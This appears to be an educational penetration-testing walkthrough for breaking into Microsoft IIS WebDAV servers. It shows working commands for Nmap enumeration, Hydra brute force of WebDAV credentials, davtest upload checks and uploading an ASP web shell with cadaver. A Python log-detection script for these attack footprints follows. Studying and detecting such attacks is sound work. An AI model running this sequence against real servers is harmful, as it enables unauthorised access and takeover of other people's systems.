🧨Exploiting Microsoft IIS WebDAV

What is Microsoft IIS?

  • IIS (Internet Information Services) is a proprietary extensible web server software developed by Microsoft for use with the Windows NT family.

  • It can be used to host websites/web apps and provides administrators with a robust GUI for managing websites.

  • IIS can be used to host both static and dynamic web pages developed in ASP.NET and PHP.

  • Typically configured to run on ports 80/443.

  • Supported executable file extensions:

    • .asp

    • .aspx

    • .config

    • .php

What is WebDAV?

  • WebDAV (Web-based Distributed Authoring and Versioning) is a set of extensions to the HTTP protocol which allow users to collaboratively edit and manage files on remote web servers.

  • WebDAV essentially enables a web server to function as a file server for collaborative authoring.

  • WebDAV runs on top of Microsoft IIS on ports 80/443.

  • To connect to a WebDAV server you need legitimate credentials, because WebDAV implements authentication in the form of a username and password.

WebDAV Exploitation

  • The first step of the exploitation process will involve identifying whether WebDAV has been configured to run on the IIS web server.

  • We can perform a brute-force attack on the WebDAV server in order to identify legitimate credentials that we can use for authentication.

  • After obtaining legitimate credentials, we can authenticate with the WebDAV server and upload a malicious .asp payload that can be used to execute arbitrary commands or obtain a reverse shell on the target.

Tools for Exploitation

  • davtest - Used to scan, authenticate and exploit a WebDAV server.

  • cadaver - Cadaver supports file upload, download, on-screen display, in-place editing, namespace operations (move/copy), collection creation and deletion, property manipulation, and resource locking on WebDAV servers.

Attack Flow for the Microsoft IIS WebDAV Server

1. Identify the Target Using Nmap

Objective: Determine if the target web application is running Microsoft IIS WebDAV.

Command:

nmap -sC --script=http-enum <target>

Explanation:

  • -sC: Use default scripts.

  • --script=http-enum: Specifically use the HTTP enumeration script to gather detailed information about the web server and its directories.

2. Brute Force Authentication Using Hydra

Objective: Perform a brute force attack on the /webdav/ folder to gain authentication credentials.

Command:

hydra -l <user> -P <password_list> <target> http-get /webdav/

Explanation:

  • -l: Specifies the username.

  • -P: Specifies the password list.

  • http-get: The Hydra module to use (HTTP GET with basic authentication), followed by the path to target.

3. Validate Upload Capabilities with Davtest

Objective: Confirm which file extensions can be uploaded and executed on the WebDAV server.

Command:

davtest -auth <user>:<pass> -url http://<target>/webdav

Explanation:

  • -auth: Specifies the authentication credentials.

  • -url: Specifies the URL of the WebDAV directory.

4. Upload a Shell Using Cadaver

Objective: Use Cadaver to upload a web shell to the server.

Command:

cadaver http://<target>/webdav

Procedure:

  1. Run the command to start Cadaver.

  2. When prompted, enter the username and password obtained from the brute force attack.

  3. At the dav:/webdav/> prompt, use the following command to upload the shell:

    put /usr/share/webshells/asp/webshell.asp

Explanation:

  • cadaver: Command-line WebDAV client.

  • put: Uploads the specified file to the WebDAV directory.

5. Access the Web Shell

Objective: Gain GUI-based shell access to the server.

Steps:

  1. Navigate to the uploaded shell in your browser:

    http://<target>/webdav/webshell.asp

  2. Use the web shell interface to execute commands on the server.
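A detection-side counterpart to the five steps above, added here and not part of the original page: a Python scan over IIS W3C log entries that flags the three footprints this flow leaves on the server (repeated 401s against /webdav/ from the Hydra stage, a successful PUT of an executable extension from the davtest/cadaver stage, and a later GET of that uploaded file). The field subset, the sample entries and the failure threshold are constructed assumptions, not a real capture.

```python
"""Flag WebDAV-abuse indicators in IIS W3C logs: brute force, executable upload, shell use."""
from collections import Counter

EXEC_EXT = (".asp", ".aspx", ".config", ".php")  # extensions the page lists as executable under IIS
BRUTE_THRESHOLD = 5  # 401s from one client against /webdav/ before flagging (assumed tuning value)

# Constructed sample log in W3C extended format (field subset); not a real capture.
SAMPLE_LOG = """#Fields: date time cs-method cs-uri-stem cs-uri-query cs-username c-ip sc-status
2024-01-01 10:00:01 PROPFIND /webdav/ - - 10.0.0.5 401
2024-01-01 10:00:02 GET /webdav/ - - 10.0.0.5 401
2024-01-01 10:00:02 GET /webdav/ - - 10.0.0.5 401
2024-01-01 10:00:03 GET /webdav/ - - 10.0.0.5 401
2024-01-01 10:00:03 GET /webdav/ - - 10.0.0.5 401
2024-01-01 10:00:04 GET /webdav/ - - 10.0.0.5 401
2024-01-01 10:00:05 GET /webdav/ - bob 10.0.0.5 200
2024-01-01 10:00:09 PUT /webdav/webshell.asp - bob 10.0.0.5 201
2024-01-01 10:00:15 GET /webdav/webshell.asp cmd=whoami bob 10.0.0.5 200
2024-01-01 10:01:00 GET /index.html - - 10.0.0.9 200
"""

def parse_w3c(text):
    """Yield one dict per entry, keyed by the names given in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def detect_webdav_abuse(text):
    """Return (rule, client-ip, detail) findings in log order."""
    findings, failures, uploaded = [], Counter(), set()
    for e in parse_w3c(text):
        ip, uri, status = e["c-ip"], e["cs-uri-stem"].lower(), e["sc-status"]
        # Stage 2: repeated authentication failures against the WebDAV root.
        if uri.startswith("/webdav/") and status == "401":
            failures[ip] += 1
            if failures[ip] == BRUTE_THRESHOLD:
                findings.append(("webdav_bruteforce", ip, f"{BRUTE_THRESHOLD} auth failures on /webdav/"))
        # Stages 3-4: a 2xx PUT whose target carries an executable extension.
        if e["cs-method"] == "PUT" and uri.endswith(EXEC_EXT) and status.startswith("2"):
            uploaded.add(uri)
            findings.append(("webdav_exec_upload", ip, f"PUT {uri} as {e['cs-username']}"))
        # Stage 5: the uploaded file is then requested and served.
        if e["cs-method"] == "GET" and uri in uploaded and status == "200":
            findings.append(("webshell_request", ip, f"GET {uri}?{e['cs-uri-query']}"))
    return findings

if __name__ == "__main__":
    for rule, ip, detail in detect_webdav_abuse(SAMPLE_LOG):
        print(f"{rule:20} {ip:12} {detail}")
```

A MOVE that renames a harmless upload to an executable extension is not caught here, because the W3C format logs the source URI and the destination lives in the request's Destination header, so that case needs request-header logging or a file-system watch on the WebDAV directory.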

Hacker's Mantra: Should we fear hackers? Intention is at the heart of this discussion. - Kevin Mitnick